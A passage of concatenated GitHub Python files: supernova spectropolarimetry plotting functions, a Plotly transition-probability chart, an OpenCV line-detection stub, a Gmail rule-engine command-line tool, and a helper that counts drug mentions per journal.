U, yerr=Usig, xerr=Qsig, ecolor=\"grey\", hold=True, fmt=\"none\", zorder = 4 ) #comment out to see points by wavelength\r\n for i, txt in enumerate(epoch_labels):\r\n ax.annotate(txt, xy = (Q[i]+0.0005, U[i]), fontsize = 14) #label each data point according to epoch_labels provided \r\n \r\n ax.legend(loc=\"lower left\",fontsize='x-small')\r\n if save != 'none':\r\n fig.savefig(\"QU_Plots/\"+ title)\r\n print(\"figure saved in QU_Plots directory under\" + str(title))\r\n else:\r\n print(\"set save = on to save figure\")\r\n fig.show()\r\n \r\n #return (print(\"Q vs U plot has been saved under filename \" + str(title) + \" in the QU_Plots directory\"))\r\n return() \r\n \r\ndef plot_line_velspace(data_t, rest_wave, velocity, flx_factor, epoch, save = \"off\", plot = \"off\"):\r\n \"\"\"Creates a velocity space plot centered on desired line. 
\r\n    Takes in a data table (from Bin_data or get_txtFITS), the wavelength of the line to center plot on, \r\n    the velocity range to go out to on either end, the flux factor so flux fits to scale with polarization, \r\n    an epoch for the plot title (no spaces) and option to save if save = on to folder VelSpace_plots/epoch+rest_wave\r\n    (save is automatically off so plot will not save)\"\"\"\r\n\r\n    title = str(epoch) + \" Velocity Region Centered on \" + str(rest_wave)\r\n    vel=[] #create list for velocity values\r\n    wave_range = get_obswave(rest_wave, velocity) #calculate wavelengths on either side of rest that pertain to velocity region desired\r\n    line_data = get_lines(data_t, wave_range[1], wave_range[0]) #get lines from data table in between wavelengths in velocity range\r\n    #print(line_data)\r\n    for i in line_data['wave']:\r\n        vel.append(get_velocity(rest_wave, i)) #calculate velocities for each wavelength in selected data region\r\n    \r\n    if plot != \"off\":\r\n        #plot total polarization and flux in velocity range\r\n        plt.figure(figsize= (10,7)); plt.title(title, fontsize = '20')\r\n        plt.plot(vel, line_data['p'], color = 'k', label = \"Total Polarization\")\r\n        plt.fill_between(vel, line_data['flx']*flx_factor, color = 'skyblue', label = 'Relative Flux')\r\n        plt.ylabel('Percent Total Polarization', fontsize = '20'); plt.xlabel('Velocity (km/s)',fontsize = '20'); plt.legend(fontsize = '14')\r\n    \r\n    if save != \"off\":\r\n        #plt.savefig(\"VelSpace_plots/\"+str(epoch)+str(rest_wave)) #option to save plot\r\n        plt.savefig(\"VelSpace_plots/\"+str(epoch)+str(rest_wave))\r\n        \r\n    return(line_data)\r\n\r\ndef plot_all_data(unbin_epoch_tables_list, epoch_tables_list, flux_adjust_list, pflux_adjust_list, epoch_labels_list, title = \"none\", xmin = \"none\", xmax = \"none\",):\r\n    #find xmin, xmax from first epoch values if not otherwise provided \r\n    if xmin == 'none':\r\n        xmin = np.min(epoch_tables_list[0]['wave'])\r\n    if xmax == 'none':\r\n        xmax = np.nanmax(epoch_tables_list[0]['wave'])\r\n    \r\n    #plot polarization and flux for each epoch stacked \r\n    fig, (ax0, ax1, ax2, ax3, ax4, ax5) = plt.subplots(6, sharex = True, figsize = (20, 24))\r\n    \r\n    if title != 'none':\r\n        fig.suptitle(title, fontsize = 16)\r\n    #fig.set_xlim([xmin, xmax]) \r\n    ax0.set_ylabel('Relative Flux'); ax1.set_ylabel('% Polarization'); ax2.set_ylabel('polarized flux'); ax3.set_ylabel('% Q'); ax4.set_ylabel('% U'); ax5.set_ylabel('PA')\r\n    ax5.set_xlabel('Wavelength (Å)') \r\n\r\n    count = 0\r\n    #plot flux with proper adjustment to be on same scale\r\n    for epoch in unbin_epoch_tables_list: \r\n        color = iter(cm.rainbow(np.linspace(0, 1, count))); \r\n        ax0.plot(epoch['wave'], epoch['flx']*flux_adjust_list[count], label = epoch_labels_list[count], lw = 1)\r\n        ax0.legend()\r\n        count = count + 1\r\n    \r\n    #plot polarization data \r\n    count = 0\r\n    for epoch in epoch_tables_list:\r\n        ax1.step(epoch['wave'], epoch['p'])\r\n        ax2.step(epoch['wave'], epoch['p']*epoch['flx']*pflux_adjust_list[count]); count = count+1\r\n        ax3.step(epoch['wave'], epoch['q']) #already in %p \r\n        ax4.step(epoch['wave'], epoch['u'])\r\n        ax5.step(epoch['wave'], PA(epoch['q'], epoch['u'])) #PA function found in get_data.py\r\n    \r\n    return(fig)\r\n\r\ndef plot_all_flx(unbin_epoch_tables_list, flx_adjust_list, epoch_names, num_epochs):\r\n    \r\n    plt.figure(figsize=(15, 12))\r\n    plt.subplots_adjust(hspace=0)\r\n    plt.rc('axes', labelsize= 12) # fontsize of the x and y labels\r\n    plt.rc('xtick', labelsize= 12) # fontsize of the tick labels\r\n    plt.rc('ytick', 
labelsize= 12) # fontsize of the tick labels\r\n plt.rc('legend', fontsize= 12) # legend fontsize\r\n #plt.xlabel('Wavelength (Å)'), plt.ylabel('Relative Flux')\r\n # loop through the length of list of unbinned epoch data tables and keep track of index\r\n for n, epoch in enumerate(unbin_epoch_tables_list):\r\n # add a new subplot iteratively\r\n ax = plt.subplot(num_epochs, 1, n+1)#stack them\r\n ax.set_xlim(4000, 8000); ax.set_xticks([])#share same x-axis scale but don't show for each of them \r\n ax.set_xlabel('Wavelength (Å)', fontsize = 12)\r\n ax.plot(epoch['wave'], epoch['flx']*flx_adjust_list[n], c = 'k', label = str(epoch_names[n]) ) #label each one by epoch\r\n ax.set_yticks([1,3,5])\r\n #ax.axvline(4924, c = 'b')\r\n plt.legend() \r\n if n == 0: \r\n ax.annotate('He I', (5600, 5.85))\r\n ax.annotate('Fe II', (4750, 4.25))\r\n ax.annotate('$\\\\bigoplus$', (6850, 4.25))\r\n ax.annotate('$\\\\bigoplus$', (7600, 2))\r\n if n == 5: \r\n ax.annotate('Mg I', (4571, 3.25))\r\n ax.annotate('Fe II (λλλ)', (4900, 3.25))\r\n ax.annotate('O I', (5577, 2.5))\r\n ax.annotate('NaID', (5890, 2.5))\r\n ax.annotate('O I', (6364, 4.5))\r\n if n == len(epoch_names)/2-1: \r\n ax.set_ylabel('Relative Flux', fontsize = 12) \r\n ax.set_xticks(np.arange(4000, 8000, 250))#show only x-axis for last plot\r\n return()\r\n\r\ndef plot_all_epochs(epoch_tables_list, flx_adjust_list, epoch_labels_list, title = \"none\", xmin = \"none\", xmax = \"none\", regions_list = 'none', line_list = 'none', label_list = 'none', color_list='none', polflux = 'off'):\r\n \"\"\"Creates a plot of all epochs total polarization and flux stacked (spaced 5% appart). \r\n Requires list of epoch data tables (outputs of Bin_data), \r\n list of flux adjustment values so they are scaled to polarization levels, \r\n list of epoch labels as strings. 
\r\n Optional arguments are title, xmin (that epoch labels are located at), xmax and \r\n list of regions of interest (like continuum) where each region is a list of two numbers (the bounds of the region).\r\n ex: regions_list = [[5000, 5500], [7000, 7300]]\r\n There is currently no save option so plots must be save from output.\r\n The function returns the axis so anything can be added to the plot after by:\r\n image = plot_all_epochs(blah, blah....)\r\n image.axvline(x=...)\r\n \"\"\"\r\n \r\n #count number of epochs\r\n num_epochs = 0\r\n for count, item in enumerate(epoch_tables_list):\r\n num_epochs = num_epochs +1\r\n \r\n #find xmin, xmax from first epoch values if not otherwise provided \r\n if xmin == 'none':\r\n xmin = np.min(epoch_tables_list[0]['wave'])\r\n if xmax == 'none':\r\n xmax = np.nanmax(epoch_tables_list[0]['wave'])\r\n \r\n #plot polarization and flux for each epoch stacked \r\n fig, (ax) = plt.subplots(1, sharex = True, figsize = (10, 10))\r\n \r\n if title != 'none':\r\n ax.set_title(title, fontsize = 12)\r\n #ax.set_xlim([xmin, xmax]) \r\n count = 0 #count each epoch to index correct flx adjust and epoch label \r\n fmax_list = [] #creat list to store maximum values to position labels\r\n\r\n if polflux != 'off':\r\n space = (num_epochs-1)*4 #calculate total space needed to plot epochs stacked\r\n ax.set_xlabel(\"Wavelength (Å)\", fontsize = 14); ax.set_ylabel(\"Relative Polarized Flux\", fontsize = 14)\r\n for epoch in epoch_tables_list:\r\n P_Flux = epoch['p']*epoch['flx']*flx_adjust_list[count]\r\n ax.step(epoch['wave'], P_Flux + space)\r\n #ax.annotate(epoch_labels_list[count], xy = (xmin + 50, space +2), fontsize = 14) \r\n count = count +1; space = space - 5\r\n\r\n else:\r\n space = (num_epochs-1)*5 #calculate total space needed to plot epochs 5% appart\r\n ax.set_xlabel(\"Wavelength (Å)\", fontsize = 12); ax.set_ylabel(\"Percent Polarization\", fontsize = 12)\r\n for epoch in epoch_tables_list:\r\n p = ax.step(epoch['wave'], epoch['p'] + space, label = epoch_labels_list[count] + \" (P+\"+str(np.round(space))+\"%)\") #plot polarization of epochs spaced 5% appart \r\n ax.plot(epoch['wave'], epoch['flx']*flx_adjust_list[count] + space, color = 'k', linestyle = ':')#plot flux with adjusted scale and inline with polarization\r\n fmax = np.nanmax(epoch['flx'])*flx_adjust_list[count] + space; fmax_list.append(fmax) #find max value and store\r\n #ax.legend(loc = 'upper right')\r\n ax.annotate(epoch_labels_list[count] + \" \\n (P+\"+str(np.round(space))+\"%)\", xy = (xmin + 50, space+3 ), fontsize = 10, c=p[0].get_c()) #label epoch and polarization factor (color code label to line color)\r\n count = count +1; space = space - 5\r\n\r\n #highlight special regions (if lists of region bounds are provided)\r\n if regions_list != 'none':\r\n count_lists = 0 #index first list in list of lists\r\n\r\n for region in regions_list:\r\n aves = get_aves([epoch], region) #calculate averages for data in region \r\n ave_p = str(np.round(aves['p'][0], 3)); #get average total polarization\r\n print(ave_p)\r\n ave_perr = str(np.round(aves['perr'][0], 4)) #get average total polarization error \r\n ax.axvspan(region[0], region[1], color = 'lightgrey') #highlight region \r\n #ax.annotate(ave_p + \"% \\n \\u00B1\" + ave_perr, xy =(region[0] + 50, space+8 ), fontsize = 9) #lable polarization and error in region where xy = is a really complicated way of locating the label \r\n count_lists = count_lists + 1 #move to next region list index\r\n \r\n #add lines for features of interest \r\n if 
line_list != 'none':\r\n for xc, c in zip(line_list, color_list):\r\n ax.axvline(x=xc, c=c) #plot veritcle line at location xc in linelist with color c in colorlist\r\n \r\n label_loc = 3.5 #initial label position \r\n for xc, lab in zip(line_list, label_list):\r\n ax.text(xc-30, 28, lab, fontsize = 12, rotation = 'vertical') #add label at verticle position pmax next to line at xc, with label lab from label list \r\n #ax.text(xc+10, fmax_list[0] - .1, lab, fontsize = 14) #rotation = 'vertical') #add label at verticle position pmax next to line at xc, with label lab from label list \r\n #label_loc = label_loc + .2 #change label position each time so they don't overlap \r\n\r\n count = count + 1 #move to next epoch index \r\n space = space - 5 #reduce space so that oldest epic is on bottom of plot\r\n \r\n return(ax) \r\n\r\ndef QU(binned_data, ax = None, bfit = 'none', size = 4.5, color_data = 'wl', epoch_labels = 'none', cmap_choice = 'turbo', bfit_c = 'grey'):\r\n \"\"\"Returns QU plot given a binned_data table. The return object should be added to a figure in order\r\n to do fig.colorbar(QU_return) and fig.suptitle to make it look pretty. Multiple QU plots can be added \r\n as subplots of a figure by: \r\n import matplotlib.pyplot as plt\r\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize = (12, 5))\r\n e1 = QU(epoch1_20, 'E1', ax1)\r\n e2 = QU(epoch2_20, 'E2', ax2)\r\n fig.colorbar(e1).set_label('Wavelength(Å)') \r\n A best fit line can be calculated outside the function and passed to it to exclude points that are in the QU plot. \r\n If bfit is not specified the bestfit in calculated in the function using all the QU points. \"\"\"\r\n \r\n if ax == None:\r\n ax = plt.gca()\r\n \r\n wl = binned_data['wave']\r\n #convert fraction to percentage and ignore nan values\r\n Q = [x for x in binned_data['q'] if np.isnan(x) == False] \r\n U = [x for x in binned_data['u'] if np.isnan(x) == False]\r\n Qsig = [x for x in binned_data['qerr'] if np.isnan(x) == False]\r\n Usig = [x for x in binned_data['uerr'] if np.isnan(x) == False]\r\n \r\n wl, Q = zip(*zip(wl, Q)) #makes sure wavelength and other lists are the same length for plotting\r\n #by pairing values up in each then dropping unpaired values \r\n \r\n if bfit == 'none':\r\n bfit = best_fit(Q, U, Qsig, Usig)\r\n \r\n x_fit = bfit[0]\r\n fit = bfit[1]\r\n \r\n #calculate average error\r\n Qave_err = np.nanmean(Qsig)\r\n Uave_err = np.nanmean(Usig)\r\n print(Qave_err, Uave_err)\r\n if Qave_err < 0.1:\r\n Qave_err = 0.1\r\n if Uave_err < 0.1:\r\n Uave_err = 0.1 \r\n\r\n #plot\r\n ax.axhline(0, color = 'k', linewidth = 1, zorder = 1)\r\n ax.axvline(0, color = 'k', linewidth=1, zorder = 2)\r\n ax.plot(Q, U, c = 'lightgrey', linewidth = 2, zorder = 3 )\r\n ax.axis('square'); ax.set_xlim([-float(size), float(size)]); ax.set_ylim([-float(size), float(size)]) #comment out to see zoomed in \r\n #ax.set_xlabel(\"q(%)\", fontsize = 18); ax.set_ylabel(\"u(%)\", fontsize = 18); ax.yaxis.set_label_coords(-.13, .5)\r\n #ax.tick_params(labelsize=18)\r\n \r\n if epoch_labels == 'none':\r\n #if plotting a a single epoch of data plot colors accoring to wavelength\r\n im = ax.scatter(Q,U, marker = 'o', c=wl, s=20, zorder = 4, cmap = cmap_choice) #c=color set to a different color for each point in wavelength array, s=size \r\n #if another column of data is provided for colorcoding use that (for example 'vel' column from get_vel_column to colorcode in velocity space)\r\n if color_data != 'wl':\r\n im = ax.scatter(Q,U, marker = 'o', c=color_data, s=20, zorder = 4, cmap 
= cmap_choice) #c=color set to a different color for each point in wavelength array, s=size \r\n        #fig.colorbar(im).ax.set_ylabel('Wavelength(Å)', fontsize=12) #shows colorbar and labels it\r\n        #ax.plot(x_fit, fit, bfit_c, lw=2, label=\"Best Fit\", zorder = 5) #best fit line\r\n        ax.errorbar((-float(size) + .5), (float(size) - .58), xerr = Qave_err, yerr = Uave_err) #add error bar example in location based on grid size \r\n        ax.text((-float(size)+ .8), (float(size) - .55), \"Average Error\", fontsize = 10)\r\n        #ax.legend(loc=\"lower left\", fontsize='medium')\r\n    else:\r\n        #if plotting average data points (wavelength doesn't matter) plot all points as same color \r\n        im = ax.scatter(Q,U, marker = 'o', s=20, zorder = 5)\r\n        ax.errorbar(Q, U, yerr=Usig, xerr=Qsig, ecolor=\"grey\", fmt=\"none\", zorder = 4 ) #comment out to see points by wavelength\r\n        for i, txt in enumerate(epoch_labels):\r\n            ax.annotate(txt, xy = (Q[i]+0.0005, U[i]), fontsize = 14) #label each data point according to epoch_labels provided \r\n    \r\n    return(im)\r\n\r\ndef plot_QU_spec_comp2(unbindata, bindata, flx_adjust, region_lists, region_names, comp_color = 'whole_region'):\r\n    \"\"\"Creates a plot with the flux and polarization spectrum of a single epoch of data as the bottom panel\r\n    and two square plots comparing Q/U data of 2 selected regions in that same epoch above (hence comp2). \r\n    Q/U plots are color coded in velocity space with the colorbar dictated by the second region given. \r\n    Inputs required are: unbinned data table from get_fits, bindata table from Bin_data, \r\n    flx_adjust = a single number for flx adjust to adjust flx spectrum to polarization level for bottom panel, \r\n    region_lists = a list of two lists for the two line regions to compare where in each list the entries are \r\n    [blue_limit_wave, rest_wave, red_limit_wave], region_names = a list of region names as strings, \r\n    comp_color = a string value (blue or red) that specifies what side of the rest wavelength you want to compare in Q/U space.\r\n    If no color is given the default is to compare the whole line region from the blue limit to the red limit\r\n    \r\n    ***NOTE: whatever region has complete data should be the second region listed, \r\n    if the second region does not have data spanning the whole region specified the Q/U velocity color scale will be inaccurate.
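\r\n    A hypothetical example call (every number and name below is a made-up placeholder, not a value from any real data set):\r\n    plot_QU_spec_comp2(unbinned, binned, 2.5, [[6200, 6563, 6900], [4600, 4861, 5100]], ['region1', 'region2'], comp_color = 'blue')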
\r\n    \"\"\"\r\n    \r\n    fig = plt.figure()\r\n    fig.set_figheight(8)\r\n    fig.set_figwidth(10)\r\n\r\n    ax1 = plt.subplot2grid(shape=(2,2), loc=(1,0), colspan = 2)\r\n    ax2 = plt.subplot2grid(shape=(2,2), loc=(0,0), colspan = 1)\r\n    ax3 = plt.subplot2grid(shape=(2,2), loc=(0,1), colspan = 1)\r\n    ax_list = [ax2, ax3] #put in list for QU plots loop\r\n    \r\n    #bottom panel - spectra \r\n    ax1.fill_between(unbindata['wave'], unbindata['flx']*flx_adjust, color = 'silver')\r\n    ax1.step(bindata['wave'], bindata['p'], c = 'k')\r\n    ax1.set_ylim([0, 5.2])\r\n    ax1.set_ylabel('Percent Total Polarization')\r\n    ax1.set_xlabel('Wavelength (Å)')\r\n    \r\n    #top squares - line region QUs\r\n    ax2.annotate(region_names[0], (3, 4))\r\n    ax2.set_ylabel(\"%U\")\r\n    ax2.set_xlabel(\"%Q\", loc = 'right')\r\n    ax2.add_patch(plt.Circle((0, 0), radius = .32, edgecolor='red', facecolor = 'none'))#isp\r\n\r\n    ax3.annotate(region_names[1], (3, 4))\r\n    ax3.add_patch(plt.Circle((0, 0), radius = .32, edgecolor='red', facecolor = 'none'))#isp\r\n\r\n    \r\n    for region, ax in zip(region_lists, ax_list):\r\n        ax1.axvspan(region[0], region[1], color = 'paleturquoise', alpha = .5)\r\n        ax1.axvspan(region[1], region[2], color = 'lightcoral', alpha = .4)\r\n        \r\n        #get QU data in velocity space for blue region of lines\r\n        if comp_color == 'blue':\r\n            reg = get_lines(bindata, region[0], region[1])\r\n            reg_vel = get_vel_column(reg, region[1])\r\n            reg_qu = QU(reg_vel, ax = ax, color_data = reg_vel['vel'], cmap_choice = 'winter')\r\n        \r\n        #get QU data in velocity space for red region of lines\r\n        if comp_color == 'red':\r\n            reg = get_lines(bindata, region[1], region[2])\r\n            reg_vel = get_vel_column(reg, region[1])\r\n            reg_qu = QU(reg_vel, ax = ax, color_data = reg_vel['vel'], cmap_choice = 'spring')\r\n        \r\n        if comp_color == 'whole_region':\r\n            reg = get_lines(bindata, region[0], region[2])\r\n            reg_vel = get_vel_column(reg, region[1])\r\n            reg_qu = QU(reg_vel, ax = ax, color_data = reg_vel['vel'], cmap_choice = 'turbo')\r\n        \r\n    plt.subplots_adjust(left=0, bottom=0, right=.85, top=.99, wspace=0.01, hspace=0.13)\r\n    cbar_ax = fig.add_axes([.85, 0.5, 0.02, 0.5])\r\n    fig.colorbar(reg_qu, cax=cbar_ax).set_label('Velocity(km/s)', rotation= 90) \r\n    return()\r\n\r\ndef make_gif(file_list, movie_name, slide_time):\r\n    \"\"\"makes a gif out of files provided in the file_list.
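\r\n    Example call (hypothetical file names): make_gif(['e1.png', 'e2.png'], 'evolution.GIF', 0.8)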
\r\n    The GIF is saved under movie_name (make sure to include .GIF at the end of the movie name) \r\n    and the slide_time specifies how long to spend on each image\"\"\"\r\n    \r\n    images = []\r\n\r\n    for filename in file_list:\r\n        images.append(imageio.imread(filename))\r\n    imageio.mimsave(str(movie_name), images, duration = slide_time)\r\n    return(print(\"GIF saved\"))\r\n\r\n","repo_name":"sablol/SNe_codes","sub_path":"plot_codes.py","file_name":"plot_codes.py","file_ext":"py","file_size_in_byte":30311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"8341023627","text":"from plotly.offline import iplot, init_notebook_mode\nimport plotly.graph_objs as go\nimport plotly.io as pio\nimport numpy as np\ninit_notebook_mode(connected=True)\nimport itertools\ncombinations=list(itertools.product(list(log_rep.columns), list(log_rep.columns))) # all combinations of two lists as a tuple\ntrans_tabels=[log_rep.T,df_step_2.T,df_step_3.T,df_step_4.T, df_step_5.T] # Transition matrices \n\ntraces = [go.Scatter(\n            x = np.arange(0, 5, 1),\n            y=[df.loc[i] for df in trans_tabels],\n            mode = 'markers+lines',\n            name = str(i)\n            ) for i in combinations]\n\nupdatemenus_ = list([\n    dict(\n        buttons = list([\n            dict(\n                args=['visible', True],\n                label='show',\n                method='restyle'\n            ),\n            dict(\n                args=['visible', 'legendonly'],\n                label='hide',\n                method='restyle'\n            )\n        ]),\n        direction = 'right',\n        pad = {'r': 10, 't': 10},\n        showactive = True,\n        type = 'buttons',\n        x = 0.5,\n        xanchor = 'right',\n        y = 1.1,\n        yanchor = 'top'\n    ),\n])\n\nlayout = go.Layout(\n    title = 'Transition probabilities within five steps for each transition of people with repetitive behaviour'\n)\n\nlayout['updatemenus'] = updatemenus_\n\nfig = go.Figure(data=traces,layout=layout)\niplot(fig, filename='Transition_probabilities.html')\n","repo_name":"Arsova/Plotly_Dashbords_and_examples","sub_path":"Buttons_hide_show_full_legend.py","file_name":"Buttons_hide_show_full_legend.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"14527598614","text":"#!/usr/bin/env python3\n\nimport cv2\nimport numpy as np\nimport time\nimport sys\n\nimg1_path = ''\nimg2_path = ''\n\nimg1 = cv2.imread (img1_path, 1)\nimg2 = cv2.imread (img2_path, 1)\n\nif img1 is None or img2 is None:\n    print (\"ERROR!!: Unable to read one of the images\")\n    sys.exit (-1)\n\ngray1 = cv2.cvtColor (img1, cv2.COLOR_BGR2GRAY)\n_, mask1 = cv2.threshold (gray1, 1, 255, cv2.THRESH_BINARY)\n\ngray2 = cv2.cvtColor (img2, cv2.COLOR_BGR2GRAY)\n_, mask2 = cv2.threshold (gray2, 1, 255, cv2.THRESH_BINARY)\n\nbd = cv2.line_descriptor.BinaryDescriptor_createBinaryDescriptor ()\n\nkeylines1, descriptors1 = bd.detect (gray1, mask1, False, False)\nkeylines2, descriptors2 = bd.detect (gray2, mask2, False, False)\n\nlbd_octave1 = []\nlbd_octave2 = []\n","repo_name":"ksakash/py_exp","sub_path":"line_stitch.py","file_name":"line_stitch.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"3723539105","text":"\"\"\"Main file to start application.\n\n@file mail_helper.py\n@author Dilip Kumar Sharma\n@date 19th July 2023\n\nAbout; -\n--------\n    It is responsible for starting the app.\n\n    This class implements arg parser to provide command line arguments.\n\n    This module works as a starting point for our application.\n    This module drives all other operations like
validations, initialization, fetching emails and applying rules.\n\"\"\"\n# Core python packages\nimport os\nimport json\nimport argparse\nfrom enum import IntEnum\nfrom dataclasses import dataclass\n\n# Application packages\nfrom src.initialize import (\n    init_credential_json,\n    create_ftsi,\n    check_ftsi,\n    validate_auth,\n)\nfrom src import environment\nfrom src import create_log_directory\nfrom src.rule_engine.rule_parser import RuleParser\nfrom src.mail_engine.mail_engine import MailEngine\nfrom src.rule_engine.rule_validation import RuleValidation\nfrom src.rule_engine.rule_engine import RuleEngine\nfrom src.utils.api_logger import ApiLogger\nfrom src.utils.file_helper import delete_file\nfrom src.data_layer.db_validation import check_db_connection\nfrom src.initialize import auth, un_auth\n\n\nclass ArgOption(IntEnum):\n    VALIDATE = 1\n    AUTH = 2\n    UNAUTH = 3\n    EMAIL = 4\n    SHOW_RULES = 5\n    APPLY_RULES = 6\n\n\nclass CommandInterface:\n    \"\"\"\n    Command line support for the application\n    \"\"\"\n\n    def __init__(self) -> None:\n        self.parser = None\n\n    @dataclass\n    class Choice:\n        option: ArgOption = 1\n        rule: str = None\n\n    def initialize_cmd(self) -> None:\n        \"\"\"\n        To initialize arg parser\n        \"\"\"\n        self.parser = argparse.ArgumentParser(\n            prog=\"mail_helper\",\n            description=\"List the cmd parameters for mail helper\",\n            formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n            epilog=\"Thanks for using %(prog)s! :)\",\n        )\n\n    def create_arguments(self, available_rules: list) -> None:\n        \"\"\"\n        To create command line arguments.\n\n        Args:\n            available_rules (list): List of rules as defined in email_rules.json\n        \"\"\"\n        group = self.parser.add_mutually_exclusive_group()\n\n        group.add_argument(\n            \"-v\",\n            \"--validate\",\n            default=False,\n            action=\"store_true\",\n            help=\"To do basic validation for db connection.\",\n        )\n\n        group.add_argument(\n            \"-a\",\n            \"--auth\",\n            default=False,\n            action=\"store_true\",\n            help=\"To do authentication with gmail api.\",\n        )\n\n        group.add_argument(\n            \"-u\",\n            \"--unauth\",\n            default=False,\n            action=\"store_true\",\n            help=\"To do un-authentication with gmail api.\",\n        )\n\n        group.add_argument(\n            \"-e\",\n            \"--email\",\n            default=False,\n            action=\"store_true\",\n            help=\"To fetch emails from Gmail\",\n        )\n\n        group.add_argument(\n            \"-s\",\n            \"--showrules\",\n            choices=available_rules + [\"all\"],\n            help=\"Show all the available rules.
Select all for all rules or select a particular rule\",\n            nargs=1,\n            type=str,\n        )\n\n        group.add_argument(\n            \"-ar\",\n            \"--applyrule\",\n            choices=available_rules,\n            help=\"Apply given rule by its name with value from json key 'rule'\",\n            nargs=1,\n            type=str,\n        )\n\n    def get_choice(self, available_rules: list) -> Choice:\n        \"\"\"\n        Get the choice selected by user in CMD.\n\n        Args:\n            available_rules (list): List of rules as defined in email_rules.json\n\n        Returns:\n            Choice: Choice selected by user\n        \"\"\"\n        self.create_arguments(available_rules=available_rules)\n\n        choice = CommandInterface.Choice()\n        args = self.parser.parse_args()\n\n        if args.validate:\n            choice.option = ArgOption.VALIDATE\n        elif args.auth:\n            choice.option = ArgOption.AUTH\n        elif args.unauth:\n            choice.option = ArgOption.UNAUTH\n        elif args.email:\n            choice.option = ArgOption.EMAIL\n        elif args.showrules:\n            choice.option = ArgOption.SHOW_RULES\n            choice.rule = args.showrules[0]\n        elif args.applyrule:\n            choice.option = ArgOption.APPLY_RULES\n            choice.rule = args.applyrule[0]\n        # with no flag given, fall back to the Choice defaults instead of\n        # indexing into args.applyrule (which would be None and crash)\n\n        return choice\n\n\nclass MailHelper:\n    def __init__(self) -> None:\n        self.rule_parser = None\n        self.rule_validation = None\n\n    def initialize(self) -> None:\n        \"\"\"\n        Do all initialization related tasks.\n        \"\"\"\n        print(\"Creating log directory\")\n        create_log_directory()\n\n        rule_file_path = os.path.join(\n            os.getcwd(), \"configuration\", environment, \"email_rules.json\"\n        )\n\n        self.rule_parser = RuleParser(rule_file_path)\n        self.rule_parser.parse()  # Parse email_rules.json file\n        self.rule_validation = RuleValidation(self.rule_parser)\n\n        # Read gmail credentials from .env file and write them to a json file because\n        # gmail api uses .json file to read credentials.\n        init_credential_json()\n\n    def init_cmd(self) -> None:\n        \"\"\"\n        To initialize CMD parser.\n        \"\"\"\n        print(\"************************ Mail Helper CLI ************************\")\n\n        self.cli.initialize_cmd()\n\n    @check_db_connection\n    def validate(self) -> None:\n        \"\"\"\n        Triggers all validations.\n        Like DB connection and validation related to email_rules.json file.\n        \"\"\"\n        # Validate rule parser data\n        self.rule_validation.verify_rules()\n        print(\"All validations are done, please proceed.\")\n\n    def show_rules(self, rule: str) -> None:\n        \"\"\"\n        To show rules available in email_rules.json file.\n        Args:\n            rule (str): Name of the rule from 'rule' attribute from email_rules.json file.\n        \"\"\"\n        ApiLogger.log_info(f\"Show rule '{rule}'.\")\n\n        if rule == \"all\":\n            print(json.dumps(self.rule_parser.get_all(), indent=1))\n        else:\n            print(json.dumps(self.rule_parser.get_rule(rule), indent=1))\n\n    @check_db_connection\n    @validate_auth\n    def start_mail_engine(self) -> None:\n        \"\"\"\n        Triggers downloading emails, writing to database and creating full text search indexes.\n        Full text search indexes are created post inserting data into tables to improve performance.\n\n        Before triggering the flow, we validate we are connected to db and auth flow is completed.\n        \"\"\"\n        ApiLogger.log_debug(\"Starting Mail Engine.\")\n\n        self.mail_engine = MailEngine()\n        self.mail_engine.start()\n\n        ApiLogger.log_info(\"Creating full text search indexes.\")\n        create_ftsi()\n\n    @check_db_connection\n    @validate_auth\n    @check_ftsi\n    def start_rule_engine(self, rule: str) -> None:\n        \"\"\"\n        Triggers applying email rules from email_rules.json.\n\n        Before triggering the flow, we validate we are connected to db, auth flow is completed\n        and full text search indexes are created.\n\n        Args:\n            rule (str): The selected rule to
apply.\n        \"\"\"\n        ApiLogger.log_debug(f\"Starting Rule Engine for rule {rule}.\")\n\n        rule_data = self.rule_parser.get_rule(rule)\n        rule_engine = RuleEngine()\n\n        rule_engine.start(rule_data)\n\n    def start(self) -> None:\n        \"\"\"\n        Starting point for our application.\n        \"\"\"\n        self.initialize()\n        self.init_cmd()\n\n        ApiLogger.log_info(\"Get the choice selected by user from command line.\")\n        choice = self.cli.get_choice(self.rule_parser.get_available_rules())\n\n        self.validate()\n\n        if choice.option == ArgOption.AUTH:\n            auth()\n        elif choice.option == ArgOption.UNAUTH:\n            un_auth()\n        elif choice.option == ArgOption.EMAIL:\n            self.start_mail_engine()\n        elif choice.option == ArgOption.SHOW_RULES:\n            self.show_rules(choice.rule)\n        elif choice.option == ArgOption.APPLY_RULES:\n            self.start_rule_engine(choice.rule)\n\n    def clean_up(self) -> None:\n        \"\"\"\n        Do any necessary clean up.\n        \"\"\"\n        pass  # TBD\n\n\nif __name__ == \"__main__\":\n    mail_helper = MailHelper()\n\n    mail_helper.cli = CommandInterface()\n    mail_helper.start()\n    mail_helper.clean_up()\n    print(\"*********** Application Ended *********************\")\n","repo_name":"vyavasthita/mail-integration","sub_path":"mail_helper.py","file_name":"mail_helper.py","file_ext":"py","file_size_in_byte":8530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"23205557486","text":"import json\n\ndef read_json(file_input):\n    '''read the output json'''\n    with open(file_input) as f:\n        graph_liaison_read = json.load(f)\n    return graph_liaison_read\n\ndef add_drug_number_to_journal_dict(dict_input, key):\n    '''append drug number to the given journal'''\n    if key in dict_input.keys():\n        new_value = dict_input[key] + 1\n        dict_input[key] = new_value\n    else: \n        dict_input.update({key : 1})\n    return dict_input\n\ndef journals_more_drugs_publish(json_graph_liaiason_file):\n    '''return the journals with the most drug publications'''\n    graph_liaison_read = read_json(json_graph_liaiason_file)\n    drug_values = list(graph_liaison_read.values())\n    dict_journals = {}\n    for i in (range(len(drug_values))):\n        lst_drug_journals = []\n        for elem in drug_values[i]['journals']:\n            lst_drug_journals.append(elem[0].replace('\\\\xc3\\\\x28', ''))\n        for key in set(lst_drug_journals):\n            add_drug_number_to_journal_dict(dict_journals, key )\n    max_keys = [key for key, value in dict_journals.items() if value == 